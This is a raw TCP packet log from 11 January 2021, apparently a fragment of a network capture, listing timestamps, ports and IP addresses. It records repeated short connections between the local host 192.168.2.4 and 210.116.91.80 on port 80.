      Jan 11, 2021 17:56:54.234000921 CET4998180192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:54.240957022 CET4998280192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:54.493748903 CET8049981210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:54.502712011 CET8049982210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:54.504149914 CET4998280192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:54.505481958 CET4998280192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:54.767642021 CET8049982210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:54.768022060 CET4998280192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:54.768203974 CET4998280192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:54.775510073 CET4998380192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:55.029536009 CET8049982210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:55.039393902 CET8049983210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:55.039675951 CET4998380192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:55.040930033 CET4998380192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:55.305458069 CET8049983210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:55.305717945 CET4998380192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:55.305982113 CET4998380192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:55.445055008 CET4998480192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:55.569436073 CET8049983210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:55.705029964 CET8049984210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:55.705284119 CET4998480192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:55.707200050 CET4998480192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:55.967573881 CET8049984210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:55.967843056 CET4998480192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:55.968518972 CET4998480192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:55.972381115 CET4998580192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:56.228074074 CET8049984210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:56.233721018 CET8049985210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:56.233833075 CET4998580192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:56.234875917 CET4998580192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:56.496800900 CET8049985210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:56.496898890 CET4998580192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:56.497128963 CET4998580192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:56.516098022 CET4998680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:56.758363962 CET8049985210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:56.777096987 CET8049986210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:56.777199030 CET4998680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:56.778594971 CET4998680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:57.040232897 CET8049986210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:57.040390015 CET4998680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:57.040759087 CET4998680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:57.166096926 CET4998780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:57.301558018 CET8049986210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:57.436199903 CET8049987210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:57.437164068 CET4998780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:57.437668085 CET4998780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:57.708017111 CET8049987210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:57.708268881 CET4998780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:57.708306074 CET4998780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:57.711724043 CET4998880192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:57.977143049 CET8049988210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:57.977421999 CET4998880192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:57.977835894 CET8049987210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:57.978763103 CET4998880192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:58.244816065 CET8049988210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:58.244923115 CET4998880192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:58.245079994 CET4998880192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:58.250883102 CET4998980192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:58.510381937 CET8049988210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:58.513766050 CET8049989210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:58.513930082 CET4998980192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:58.514718056 CET4998980192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:58.778353930 CET8049989210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:58.778439999 CET4998980192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:58.778712034 CET4998980192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:58.896663904 CET4999080192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:59.041357994 CET8049989210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:59.166450977 CET8049990210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:59.166721106 CET4999080192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:59.167829990 CET4999080192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:59.438096046 CET8049990210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:59.438848972 CET4999080192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:59.439066887 CET4999080192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:59.443248987 CET4999180192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:59.703114033 CET8049991210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:59.705373049 CET4999180192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:59.705952883 CET4999180192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:59.708353043 CET8049990210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:59.966298103 CET8049991210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:59.966451883 CET4999180192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:59.966603041 CET4999180192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:59.970931053 CET4999280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:00.226361990 CET8049991210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:00.241269112 CET8049992210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:00.241576910 CET4999280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:00.242861032 CET4999280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:00.514053106 CET8049992210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:00.514270067 CET4999280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:00.514388084 CET4999280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:00.632098913 CET4999380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:00.784390926 CET8049992210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:00.894431114 CET8049993210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:00.896258116 CET4999380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:00.899096012 CET4999380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:01.161788940 CET8049993210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:01.162600994 CET4999380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:01.162818909 CET4999380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:01.168117046 CET4999480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:01.424777985 CET8049993210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:01.434789896 CET8049994210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:01.434952021 CET4999480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:01.435544014 CET4999480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:01.703845978 CET8049994210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:01.704631090 CET4999480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:01.704684019 CET4999480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:01.709749937 CET4999580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:01.968728065 CET8049995210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:01.968848944 CET4999580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:01.970967054 CET8049994210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:01.973064899 CET4999580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:02.232410908 CET8049995210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:02.232615948 CET4999580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:02.232778072 CET4999580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:02.348870993 CET4999680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:02.493532896 CET8049995210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:02.620594025 CET8049996210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:02.620829105 CET4999680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:02.624804020 CET4999680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:02.896562099 CET8049996210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:02.897696972 CET4999680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:02.897885084 CET4999680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:02.902229071 CET4999780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:03.168735027 CET8049996210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:03.170665979 CET8049997210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:03.171761990 CET4999780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:03.172489882 CET4999780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:03.441670895 CET8049997210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:03.442338943 CET4999780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:03.442393064 CET4999780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:03.446980000 CET4999880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:03.707658052 CET8049998210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:03.707870960 CET4999880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:03.708731890 CET4999880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:03.711174965 CET8049997210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:03.969791889 CET8049998210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:03.970218897 CET4999880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:03.970506907 CET4999880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:04.086889982 CET4999980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:04.230910063 CET8049998210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:04.345704079 CET8049999210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:04.345808029 CET4999980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:04.347138882 CET4999980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:04.606370926 CET8049999210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:04.606729031 CET4999980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:04.607002974 CET4999980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:04.612628937 CET5000080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:04.865374088 CET8049999210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:04.880047083 CET8050000210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:04.880150080 CET5000080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:04.880650043 CET5000080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:05.148592949 CET8050000210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:05.148885965 CET5000080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:05.149266958 CET5000080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:05.153470993 CET5000180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:05.412210941 CET8050001210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:05.412880898 CET5000180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:05.413639069 CET5000180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:05.416162014 CET8050000210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:05.672926903 CET8050001210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:05.673424006 CET5000180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:05.673607111 CET5000180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:05.787820101 CET5000280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:05.932152987 CET8050001210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:06.050143957 CET8050002210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:06.052989960 CET5000280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:06.053875923 CET5000280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:06.316679001 CET8050002210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:06.316828012 CET5000280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:06.316998005 CET5000280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:06.321404934 CET5000380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:06.578958035 CET8050002210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:06.582519054 CET8050003210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:06.583700895 CET5000380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:06.586606026 CET5000380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:06.848301888 CET8050003210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:06.849004030 CET5000380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:06.851136923 CET5000380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:06.855823040 CET5000480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:07.112061024 CET8050003210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:07.115540028 CET8050004210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:07.115823030 CET5000480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:07.116955042 CET5000480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:07.377197981 CET8050004210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:07.377598047 CET5000480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:07.377754927 CET5000480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:07.496227980 CET5000580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:07.637348890 CET8050004210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:07.764731884 CET8050005210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:07.764872074 CET5000580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:07.765417099 CET5000580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:08.034401894 CET8050005210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:08.034543037 CET5000580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:08.034780025 CET5000580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:08.041189909 CET5000680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:08.302207947 CET8050006210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:08.303275108 CET8050005210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:08.304860115 CET5000680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:08.305757046 CET5000680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:08.567388058 CET8050006210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:08.568679094 CET5000680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:08.568826914 CET5000680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:08.572065115 CET5000780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:08.829576015 CET8050006210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:08.842705011 CET8050007210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:08.844504118 CET5000780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:08.846982002 CET5000780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:09.118041992 CET8050007210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:09.118246078 CET5000780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:09.118396997 CET5000780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:09.239790916 CET5000880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:09.389296055 CET8050007210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:09.512394905 CET8050008210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:09.512562037 CET5000880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:09.513710022 CET5000880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:09.786297083 CET8050008210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:09.786765099 CET5000880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:09.786947012 CET5000880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:09.796256065 CET5000980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:10.057766914 CET8050009210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:10.058018923 CET5000980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:10.058687925 CET5000980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:10.058742046 CET8050008210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:10.320363045 CET8050009210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:10.321373940 CET5000980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:10.321631908 CET5000980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:10.327044964 CET5001080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:10.582608938 CET8050009210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:10.590290070 CET8050010210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:10.590643883 CET5001080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:10.591623068 CET5001080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:10.855813026 CET8050010210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:10.855992079 CET5001080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:10.856262922 CET5001080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:10.977680922 CET5001180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:11.119573116 CET8050010210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:11.256735086 CET8050011210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:11.256913900 CET5001180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:11.257790089 CET5001180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:11.537098885 CET8050011210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:11.537400007 CET5001180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:11.537643909 CET5001180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:11.563646078 CET5001280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:11.816095114 CET8050011210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:11.823761940 CET8050012210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:11.825414896 CET5001280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:11.826153040 CET5001280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:12.087328911 CET8050012210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:12.087544918 CET5001280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:12.087652922 CET5001280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:12.091519117 CET5001380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:12.347731113 CET8050012210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:12.349458933 CET8050013210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:12.350066900 CET5001380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:12.353857994 CET5001380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:12.612499952 CET8050013210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:12.613135099 CET5001380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:12.613528013 CET5001380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:12.727298021 CET5001480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:12.871155977 CET8050013210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:12.995274067 CET8050014210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:12.995373011 CET5001480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:12.996682882 CET5001480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:13.265201092 CET8050014210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:13.265558004 CET5001480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:13.265779972 CET5001480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:13.272397041 CET5001580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:13.528814077 CET8050015210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:13.528915882 CET5001580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:13.529620886 CET5001580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:13.533128977 CET8050014210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:13.786463976 CET8050015210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:13.786744118 CET5001580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:13.787048101 CET5001580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:13.795975924 CET5001680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:14.043226957 CET8050015210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:14.056591034 CET8050016210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:14.057692051 CET5001680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:14.060118914 CET5001680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:14.321432114 CET8050016210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:14.321732044 CET5001680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:14.322165012 CET5001680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:14.444546938 CET5001780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:14.582366943 CET8050016210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:14.704951048 CET8050017210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:14.705105066 CET5001780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:14.707397938 CET5001780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:14.968189955 CET8050017210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:14.968947887 CET5001780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:14.969177961 CET5001780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:14.975348949 CET5001880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:15.229167938 CET8050017210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:15.235466957 CET8050018210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:15.235579014 CET5001880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:15.236136913 CET5001880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:15.496850967 CET8050018210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:15.497745037 CET5001880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:15.497946978 CET5001880192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:15.528868914 CET5001980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:15.757852077 CET8050018210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:15.790251970 CET8050019210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:15.791714907 CET5001980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:15.794238091 CET5001980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:16.056045055 CET8050019210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:16.056247950 CET5001980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:16.056418896 CET5001980192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:16.165133953 CET5002080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:16.317318916 CET8050019210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:16.426357985 CET8050020210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:16.426462889 CET5002080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:16.427335978 CET5002080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:16.689208031 CET8050020210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:16.689965010 CET5002080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:16.690166950 CET5002080192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:16.692747116 CET5002180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:16.951009989 CET8050020210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:16.954132080 CET8050021210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:16.954360008 CET5002180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:16.966995001 CET5002180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:17.228844881 CET8050021210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:17.229371071 CET5002180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:17.229509115 CET5002180192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:17.233309031 CET5002280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:17.490571022 CET8050021210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:17.503469944 CET8050022210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:17.505634069 CET5002280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:17.506401062 CET5002280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:17.776748896 CET8050022210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:17.776993036 CET5002280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:17.777256012 CET5002280192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:17.898283958 CET5002380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:18.046636105 CET8050022210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:18.163469076 CET8050023210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:18.164299011 CET5002380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:18.165337086 CET5002380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:18.430999041 CET8050023210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:18.432545900 CET5002380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:18.432694912 CET5002380192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:18.437127113 CET5002480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:18.696832895 CET8050024210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:18.697525978 CET5002480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:18.697593927 CET8050023210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:18.698347092 CET5002480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:18.958631992 CET8050024210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:18.958785057 CET5002480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:18.961451054 CET5002480192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:18.968305111 CET5002580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:19.221093893 CET8050024210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:19.229466915 CET8050025210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:19.230102062 CET5002580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:19.233356953 CET5002580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:19.495107889 CET8050025210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:19.495424032 CET5002580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:19.495599985 CET5002580192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:19.619645119 CET5002680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:19.756608963 CET8050025210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:19.879506111 CET8050026210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:19.879611969 CET5002680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:19.880944014 CET5002680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:20.141428947 CET8050026210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:20.141525984 CET5002680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:20.141766071 CET5002680192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:20.145986080 CET5002780192.168.2.4210.116.91.80
      Jan 11, 2021 17:57:20.401056051 CET8050026210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:20.406014919 CET8050027210.116.91.80192.168.2.4
      Jan 11, 2021 17:57:20.406227112 CET5002780192.168.2.4210.116.91.80
